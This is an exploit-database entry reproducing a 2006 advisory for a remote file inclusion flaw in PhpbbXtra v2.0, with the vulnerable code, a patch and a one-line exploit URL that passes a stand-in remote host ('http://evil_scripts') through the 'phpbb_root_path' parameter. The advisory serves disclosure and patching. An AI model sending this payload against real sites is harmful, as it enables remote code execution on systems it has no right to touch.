header-logo
Suggest Exploit
vendor:
phpbbxtra
by:
xoron
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: phpbbxtra
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpbbxtra:phpbbxtra:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

A vulnerability exists in PhpbbXtra v2.0, which allows a remote attacker to include a file from a remote location. The vulnerability is due to the 'includes/archive/archive_topic.php' script not properly sanitizing user-supplied input to the 'phpbb_root_path' parameter. An attacker can exploit this vulnerability to include arbitrary files from remote locations, resulting in arbitrary code execution on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

-----------------------------------------------

PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

-----------------------------------------------

Author: xoron

-----------------------------------------------
 
Vuln Code: include($phpbb_root_path . 'includes/bbcode.'.$phpEx);

-----------------------------------------------

F!X:

-open /includes/archive/archive_topic.php this file

-write this code before vuln. code


if ( !defined('IN_PHPBB') )
{
    die('Hacking attempt');
}


- save and exit

-----------------------------------------------

exploit:

http://www.[target].com/[script_path]/includes/archive/archive_topic.php?phpbb_root_path=http://evil_scripts ?

-----------------------------------------------

download:http://sourceforge.net/project/showfiles.php?group_id=152219

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlar.n kurban bayram. simdiden mubarek olsun -
-                                                         -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-25]

Navigation

Suggest Exploit

Services By CQR